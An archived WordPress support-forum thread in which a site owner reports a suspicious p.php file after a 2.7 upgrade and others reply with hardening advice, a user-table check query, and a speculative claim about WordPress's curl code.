Title: WordPress 2.7 Vulnerability? Last modified: August 19, 2016 --- # WordPress 2.7 Vulnerability? * [mcupples1](https://wordpress.org/support/users/mcupples1/) * (@mcupples1) * [17 years, 5 months ago](https://wordpress.org/support/topic/wordpress-27-vulnerability/) * Hello all! There’s a problem I’ve got with the new WordPress in that I just found this file: * * called p.php in my wordpress directory. It was placed there on the 14th. Our site went down today at roughly 8am because of several hundred computers all going to: * /p.php?p=1-3897 /p.php?p=1-2910 * etc. * Any ideas on how to make sure this issue won’t happen again? I’ve since moved p.php to a directory not accessible via the web. * Thanks! Viewing 2 replies - 1 through 2 (of 2 total) * Moderator [Jan Dembowski](https://wordpress.org/support/users/jdembowski/) * (@jdembowski) * Forum Moderator and Brute Squad * [17 years, 5 months ago](https://wordpress.org/support/topic/wordpress-27-vulnerability/#post-932316) * That’s not necessarily a sign of a 2.7 vulnerability. It’s your host that did get compromised. Moving or removing the file is good, but you need to find and close the door that let that onto your blog. * Check your file and directory permissions for your website. You should read up these links * [http://codex.wordpress.org/Hardening_WordPress](http://codex.wordpress.org/Hardening_WordPress) * and * [http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/](http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/) * Check your user table for any new accounts that you don’t recognize. You can use phpMyAdmin or mysql on the command line like so: * ``` USE yourwordpressdb; SELECT * FROM wp_users; ``` * This is just to see how bad the compromise is. If you are not seeing spammy hidden links in your blogs HTML, and you don’t see any users that you don’t recognize then WordPress may be fine. * If you do find spammy links and new unknown users then get ready to restore your last good backup from before 12/14. * Check your logs for the first occurrence of p.php to see if you can identify when and how it got on your blog. * Read Donncha’s post and also check out [http://ocaoimh.ie/2008/06/26/wordpress-exploit-scanner-01/](http://ocaoimh.ie/2008/06/26/wordpress-exploit-scanner-01/). * Good luck. * [gasyoun](https://wordpress.org/support/users/gasyoun/) * (@gasyoun) * [17 years ago](https://wordpress.org/support/topic/wordpress-27-vulnerability/#post-932806) * CURL is the wordpress vulnerability 2.7+ * ``` class WP_Http_Curl { function request($url, $args = array()) { if ( !ini_get('safe_mode') && !ini_get('open_basedir') ) curl_setopt( $handle, CURLOPT_FOLLOWLOCATION, true ); ``` * ``` function wp_remote_get($url, $args = array()) { $objFetchSite = _wp_http_get_object(); return $objFetchSite->get($url, $args); } ``` * Read [http://antichat.ru/threadedpost1298124.html#post1298124](http://antichat.ru/threadedpost1298124.html#post1298124) with google translator, this is why there are so many wordpress trojans. Kill’ em. Viewing 2 replies - 1 through 2 (of 2 total) The topic ‘WordPress 2.7 Vulnerability?’ is closed to new replies. ## Tags * [exploit](https://wordpress.org/support/topic-tag/exploit/) * 2 replies * 3 participants * Last reply from: [gasyoun](https://wordpress.org/support/users/gasyoun/) * Last activity: [17 years ago](https://wordpress.org/support/topic/wordpress-27-vulnerability/#post-932806) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics